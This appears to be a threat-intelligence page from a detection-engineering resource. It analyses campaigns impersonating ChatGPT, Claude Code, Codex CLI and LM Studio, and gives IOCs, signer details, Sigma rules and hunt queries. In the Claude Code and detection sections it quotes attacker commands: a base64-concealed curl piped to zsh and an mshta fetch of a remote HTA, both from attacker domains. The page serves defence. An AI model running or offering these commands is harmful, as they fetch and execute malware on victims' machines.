Detection Chokepoints
  • Chokepoints
  • Attack Chains
  • Trends
    • ClickFix Delivery
    • Edge Exploits
    • Masq Infra
  • Framework
  • Contribute
Detection Chokepoints
Chokepoints Attack Chains
ClickFix Delivery Edge Exploits Masq Infra
Framework Contribute↗
  • Overview
  • Framework
  • Campaigns
  • ChatGPT
  • Claude Code
  • Codex CLI
  • LM Studio
  • Operators
  • Pipeline
  • Detections

Software Impersonation Infrastructure

Hunt data: de-intel-pipeline  ·  Pipeline records: 1569  ·  5 validated hunts  ·  2026-02-15 to 2026-05-17  ·  Aggregate updated: 2026-03-22

Data: Validated de-intel-pipeline hunts (URLScan/sandbox-cited) + aggregate IOC pipeline (MalwareBazaar, ThreatFox, URLScan), payload-hash confirmed.
5
Validated hunts
5
Brands targeted
2
Confirmed delivery
1569
Pipeline records
6
Payload families
0
Pipeline campaigns

Detection Chokepoint Framework

Every masquerading delivery campaign follows the same chain. The brand changes. The lure page changes. The payload host rotates. But the prerequisites don't: the adversary must register infrastructure, build a convincing lure, stage a payload, and get the victim to execute something. Perfect visual impersonation neutralizes user-facing trust signals - your detection budget belongs at execution and infrastructure layers.

Brand recon Favicon hash, title pivot T1595 RECON
›
Domain registration Squat, typosquat, co.com TLD T1583.001 DOMAINS
›
Lure page build Clone + stolen favicon/logo T1036.005 MASQ
›
Payload staging CDN, BunnyCDN, HTA host T1608.001 STAGE
›
Delivery gate JS click, UA filter, modal T1566.002 PHISH
›
User execution EXE, mshta, curl|zsh T1204.002 EXEC
Stages 1–3 are largely blind to endpoint detection. Favicon pivots and domain registration happen off-network. The lure page looks identical to the real product. Detection compounds at payload staging (network/DNS), delivery gate (proxy/IOK), and user execution (EDR/Sigma). A detection that fires only on the domain name breaks when the operator rotates hosting; one that fires on signed-binary-from-Downloads survives the rotation.

Infrastructure Patterns Across Hunts

Favicon hash pivot discovery
3/5
Cloudflare-fronted infrastructure
2/5
Post-launch domain squatting
2/5
BunnyCDN payload staging
1/5
Oracle Cloud hosting
1/5
Shell-company Authenticode signing
1/5
Affiliate / UTM tracking backend
1/5
Base64 URL obfuscation in page JS
1/5
mshta HTA delivery path
1/5
Developer API endpoint impersonation
1/5

Active Campaigns (Hunt Intelligence)

Validated hunts from the de-intel-pipeline. Each object passed schema, citation, and source-diversity validation before promotion to hunts/.

ChatGPT / OpenAI
2026-05-13 → 2026-05-16 5 IOCs 4 TTPs CONFIRMED DELIVERY

ChatGPT-Impersonation-MROScanner-Installer - Phishing / lure page, EXE download, CDN staging, Code signing abuse, Favicon pivot

chatgpt-windows.com · app-update-chatgpt.com

Claude / Anthropic
2026-04-17 → 2026-05-17 8 IOCs 4 TTPs CONFIRMED DELIVERY

Claude-Code-Impersonation-ClickFix-Install-Modal - Phishing / lure page, mshta HTA, curl | shell, Obfuscation, Favicon pivot

uneifoifow-3ndfskq.pages.dev · too.clawddddd.com · fine-byte2.com · download.version-516.com

LM Studio
2026-04-30 → 2026-05-17 2 IOCs 2 TTPs SURVEY / SQUAT

LM-Studio-Domain-Squatting-API-Endpoint-Impersonation - Brand masquerade, Phishing / lure page

lmstudio.co.com · www.api.lmstudio.co.com

Notion
2026-02-15 → 2026-05-17 1 IOCs 0 TTPs SURVEY / SQUAT

Notion-Masquerade-Delivery-Survey - Survey / squat only

notiondownload.com

OpenAI Codex CLI
2026-04-12 → 2026-05-17 4 IOCs 2 TTPs SURVEY / SQUAT

OpenAI-Codex-CLI-Domain-Squatting-Credential-Harvest - Brand masquerade, Phishing / lure page

codex-cli.org · codexhub.click · codexcli.homes · codexcli.gr.com

Brand Impersonation Matrix

BrandCampaignsDelivery methodsConfirmed delivery
ChatGPT / OpenAI 1 CDN staging; Code signing abuse; EXE download; Favicon pivot; Phishing / lure page Yes
Claude / Anthropic 1 Favicon pivot; Obfuscation; Phishing / lure page; curl | shell; mshta HTA Yes
LM Studio 1 Brand masquerade; Phishing / lure page No
Notion 1 Survey / squat only No
OpenAI Codex CLI 1 Brand masquerade; Phishing / lure page No

ChatGPT Impersonation - MROScanner OU Installer

A fake "ChatGPT for Windows" download page (chatgpt-windows.com) on Oracle Cloud serves a 2.3 MB Inno Setup installer signed by Estonian shell company MROScanner OU. Download is JS-gated - no static link in HTML - with Windows-only UA fingerprinting and per-visitor affiliate tracking via a PHP backend. Payload staged on BunnyCDN.

POST /init/tracking.php
→ returns per-visitor URL: https://app-cg.b-cdn.net/ChatGPT_Installer.exe?hash=<token>

ChatGPT_Installer.exe
SHA-256: 17dc646d645252196a19e87752fa21dbe7b626cd71a9dacddebd9a2ed8f1e16e
Signer: MROScanner OU (SSL.com, thumbprint E3B6CF11...)
The cert is the stickiest signal. MROScanner OU + thumbprint E3B6CF11... appears on every binary this operator signs until revocation (valid until April 2027). The domain rotates. The CDN bucket name rotates. The cert thumbprint does not. Monitor VT/Hunt.io for new hits on this signer.
JS-only download gate defeats static scanners. URLScan sees a blank download page. The payload URL surfaces only after JavaScript executes a POST to /init/tracking.php. Non-Windows user-agents get "Unsupported System" - further reducing scanner noise and narrowing the victim pool to paid malvertising traffic (UTM params: fbclid, bid, tid).
SignalDurabilityNotes
chatgpt-windows.comMedium3-year squatter history; repurposed May 2026
app-cg.b-cdn.netLowCDN bucket - hash the binary when sandbox completes
MROScanner OU certHighPivot on thumbprint across VT/Hunt.io
/init/tracking.phpMediumSame PHP structure links sibling campaigns

Claude Code - ClickFix Install Modal

Three fake "Download Claude" pages clone claude.com and present a fake install modal. Mac victims run a base64-concealed curl | zsh command; Windows victims run mshta https://download.version-516.com/claude. The kit predates Claude targeting - /other path was active 12 days before /claude.

# Mac - social cover echo, then malicious curl
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo '<base64>' | openssl base64 -d -A) | zsh

# Windows - HTA via signed LOLBin
mshta https://download.version-516.com/claude
Different delivery model - no file on disk for the primary vector. Paste-to-run bypasses SmartScreen entirely. The victim opens a terminal, reads a command that looks like official Anthropic install docs, and executes it. Cross-platform delivery (Mac + Windows) from the same kit with per-site payload domain rotation (xprssit.com vs ewabeniak.com).
Real Anthropic analytics loaded on every visit. Clone pages load Segment, Amplitude, and claude-custom-tracking.js from www.anthropic.com. Victim traffic blends into legitimate claude.com analytics noise - a subtle signal worth monitoring if you correlate page views with actual installs.
DomainRole
uneifoifow-3ndfskq.pages.devCloudflare Pages lure; Mac payload via xprssit.com
too.clawddddd.comTyposquat lure; Mac payload via ewabeniak.com
download.version-516.comShared Windows HTA host (/claude, /other)
xprssit.com / ewabeniak.comPer-site Mac shell script delivery (/curl/<hash>)

OpenAI Codex CLI - Domain Squatting

Multiple domains registered within weeks of the Codex CLI public launch (April 2026) squat the exact product name. No confirmed binary delivery - credential harvest and SEO poisoning targeting developers who search for install instructions instead of using npm install -g @openai/codex.

Developer tool distribution shifts the attack surface. CLI tools distributed via npm/GitHub have no downloadable installer page - favicon hash pivots don't apply when Cloudflare bot-protects openai.com. Adversaries pivot to title-based and domain-pattern queries. Watch for ClickFix paste-to-run pages appearing on these domains - the Claude Code hunt found the same pattern on Cloudflare Pages sites with similar domain age profiles.
DomainStatusPattern
codex-cli.orgPhishing-tagged; dormant empty HTMLSquats npm package name
codexhub.clickVietnamese Codex CLI page + /loginCredential harvest suspected
codexcli.homesSSL cipher mismatch - conditional servingGeo/IP gated content
codexcli.gr.com404 at scan timeDormant squat infrastructure

LM Studio - API Endpoint Impersonation

lmstudio.co.com redirects to www.api.lmstudio.co.com, impersonating the LM Studio local API server (normally localhost:1234). No installer delivery - threat is prompt exfiltration or API key theft via a misconfigured client endpoint string.

The supply chain of developer tooling config. A domain at api.lmstudio.co.com is indistinguishable from a legitimate remote LM Studio endpoint in a config string. Watch for this pattern on Ollama (localhost:11434), Jan.ai, AnythingLLM. DNS was pulled by May 11, 2026 after community phishing reports.

Notion Coverage Survey

Favicon pivot for Notion returned 5,692 non-Notion hits - structurally too noisy because Notion is used as a CMS backend by thousands of legitimate sites. No active Windows/Mac delivery campaign detected in the last 90 days. Only finding: notiondownload.com (Android APK squatter, Hostinger).

Not every brand is pivot-able. Heavily embedded brands (Notion, Google Docs) copy favicons verbatim across legitimate third-party sites. File-type narrowing (filename:*.exe) requires a URLScan API key. Title pivots and domain-pattern queries are the fallback when favicon hash pivots produce unusable noise.

Cross-Campaign Operator Comparison

Two distinct delivery philosophies emerged from the May 2026 hunt window - traditional EXE distribution vs. paste-to-run developer targeting.

MROScanner OU (ChatGPT)ClickFix Install Modal (Claude)
DeliveryEXE download (JS-gated)Paste-to-run command
File on diskYes - Inno Setup installerNo file for primary vector
Code signingShell-company AuthenticodeNot applicable
OS targetingWindows only (UA filter)Mac + Windows (separate commands)
ObfuscationBunnyCDN + per-visitor hashBase64 URL in JS + domain rotation
InfrastructureOracle Cloud dedicated VMCloudflare Pages (ephemeral)
Traffic modelPaid malvertising (UTM tracking)Real brand analytics loaded
Kit reuseUnknownConfirmed multi-brand (/other path)
SophisticationMediumMedium-high
Two operators, same target demographic. Both campaigns impersonate AI developer tools released in 2025–2026. The EXE operator buys code signing certs and runs paid traffic. The ClickFix operator skips file download entirely and targets terminal-comfortable users. Your detection stack needs both paths: signed-binary-from-Downloads and unusual-parent → mshta/curl-from-terminal.

MITRE Technique Frequency (Hunts)

TechniqueLabelHunts
T1566.002 Phishing / lure page 4
T1036.005 Brand masquerade 2
T1204.002 EXE download 1
T1102 CDN staging 1
T1553.002 Code signing abuse 1
T1218.005 mshta HTA 1
T1059.004 curl | shell 1
T1027 Obfuscation 1

Aggregate Pipeline Data

IOC-first pipeline records from confirmed payload reports and infrastructure hunts. Delivery chains shown only when URLScan captured the redirect sequence.

Payload Class Breakdown

stealer
0
c2
0
rmm
0
loader
0
unknown
20

Confirmed Delivery Domains (sample)

DomainIPClassFirst seen
salesteamrealtors.com - unknown 2026-03-22
www.thesalesteam.ca - unknown 2026-03-22
steamunlock.site - unknown 2026-03-22
uszoomwebhost.live - unknown 2026-03-22
wildcard.steam-machine.com - unknown 2026-03-22
tryclearsteam.com - unknown 2026-03-22
wpdevsteam.com - unknown 2026-03-22
www1.blockchainchatgpt.com - unknown 2026-03-22
dlads.discordl.org - unknown 2026-03-22
support.zoom.us.id.xstore1.cloud - unknown 2026-03-22
dev.eu.as.eu.discord.tattoo - unknown 2026-03-22
alcalc.discordian.ca - unknown 2026-03-22
www.app.steamlevelu.com - unknown 2026-03-22
steamboatweddingday.com - unknown 2026-03-22
staging.wwwapp.admin.discord.tattoo - unknown 2026-03-22

Favicon Clusters

HashDomainsSample
100
5
1
1

Weekly Volume

Detection Recommendations

Each recommendation maps to the ATT&CK technique it detects. Execution-layer rules survive brand rotation; domain blocklists do not.

T1036.005
PE OriginalFilename mismatch
Alert when a process OriginalFilename from the PE version resource does not match its running filename. Adversaries rename malicious binaries - they rarely recompile with matching resources.
Example detection logic
title: Masqueraded Installer OriginalFilename Mismatch
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\ChatGPT_Installer.exe'
      - '\ZoomInstaller.exe'
      - '\DiscordSetup.exe'
    CurrentDirectory|contains:
      - '\Downloads\'
      - '\AppData\Local\Temp\'
  filter_legit:
    OriginalFileName|contains:
      - 'ChatGPT'
      - 'Zoom'
      - 'Discord'
  condition: selection and not filter_legit
level: high
T1553.002
Shell-company signed binary from user download path
A signed binary executing from Downloads after a browser spawn is more anomalous than unsigned execution in managed environments. Legitimate signed software deploys via IT tooling, not user download directories. MROScanner OU is a known shell-company signer pattern.
Observed signers (1)
ChatGPT_Installer.exe
Signer: MROScanner OU (Tallinn, EE)
CA: SSL.com Code Signing Intermediate CA RSA R1
Thumbprint: E3B6CF111525417CE68C1CBE99E257DBAC54D071
Valid: 2026-04-22 to 2027-04-21
Example detection logic
title: Signed Installer Executed From Downloads After Browser Spawn
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
  selection_installer:
    Image|endswith:
      - '\setup.exe'
      - '\installer.exe'
      - '\install.exe'
    CurrentDirectory|contains: '\Downloads\'
    Signed: 'true'
  filter_known_vendors:
    SignatureStatus: 'Valid'
    Signature|contains:
      - 'Microsoft'
      - 'Google'
      - 'Zoom'
  condition: selection_parent and selection_installer and not filter_known_vendors
level: high
T1218.005
mshta fetching HTA from non-enterprise URL
mshta.exe spawned from cmd.exe, Run dialog, or terminal context fetching an HTA from an external domain. Covers Claude Code ClickFix Windows delivery via download.version-516.com/claude.
Observed payloads (1)
mshta https://download.version-516.com/claude
Example detection logic
title: Mshta Executing Remote HTA From Unusual Parent
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\mshta.exe'
    CommandLine|contains:
      - 'http://'
      - 'https://'
  selection_parent:
    ParentImage|endswith:
      - '\cmd.exe'
      - '\explorer.exe'
      - '\WindowsTerminal.exe'
  filter_enterprise:
    CommandLine|contains:
      - '.microsoft.com'
      - '.windows.com'
  condition: selection and selection_parent and not filter_enterprise
level: high
T1059.004
curl piped to shell from terminal (Mac developer targeting)
Detect curl -s ... | zsh or curl ... | bash where the URL domain is not a known package manager or vendor CDN. Claude Code install modal uses base64-concealed curl URLs on attacker-controlled domains.
Observed payloads (2)
# Social cover echo + malicious curl (Mac)
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo '<base64>' | openssl base64 -d -A) | zsh

# Decoded payload URL (uneifoifow variant)
https://xprssit.com/curl/6df71b43667a2d1d9de3e88cba7e16fb11b4ddf67af64b853b903b3fa8ead500
Example detection logic
title: Curl Piped to Shell From Non-Vendor Domain
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    Image|endswith:
      - '/curl'
      - '/zsh'
      - '/bash'
    CommandLine|contains|all:
      - 'curl'
      - '|'
  filter_vendors:
    CommandLine|contains:
      - 'anthropic.com'
      - 'homebrew.sh'
      - 'github.com'
  condition: selection and not filter_vendors
level: high
INFRA
Favicon hash pivoting for infrastructure clustering
From one confirmed fake domain: fetch favicon, compute Murmur3 hash, query Shodan/URLScan. Campaigns reusing stolen favicons across dozens of domains surface immediately. ChatGPT hunt: 158 hits on OpenAI favicon pivot; Claude: 1,003 hits.
Example hunt queries
# URLScan favicon pivot (ChatGPT)
hash:9747c13cd87b36ebf2ab567b9d0bc2ff49b5a4f46f4f51e4d053024f579fb9a0 AND NOT page.domain:openai.com

# URLScan favicon pivot (Claude)
hash:816a55828befeb50fe8a9556cb92d80194efefbd3f4e04ccf694992dd8e085e3 AND NOT page.domain:claude.ai

# Shodan
http.favicon.hash:<mmh3_int>
INFRA
Affiliate tracking backend fingerprint
The /init/tracking.php + /init/pixel.php endpoint pattern with UTM parameters (fbclid, bid, tid) indicates a paid traffic malvertising campaign. If this PHP structure reappears on another fake download page, it connects campaigns to the same kit or operator.
Example detection logic
# Proxy / DNS - hunt for sibling sites
cs-uri-stem: '/init/tracking.php'
cs-method: 'POST'
cs-uri-query|contains:
  - 'utm_source='
  - 'fbclid='

# URLScan pivot
page.url:"/init/tracking.php" AND filename:*.exe
Detection Chokepoints - community detection engineering resource GitHub Contribute MITRE ATT&CK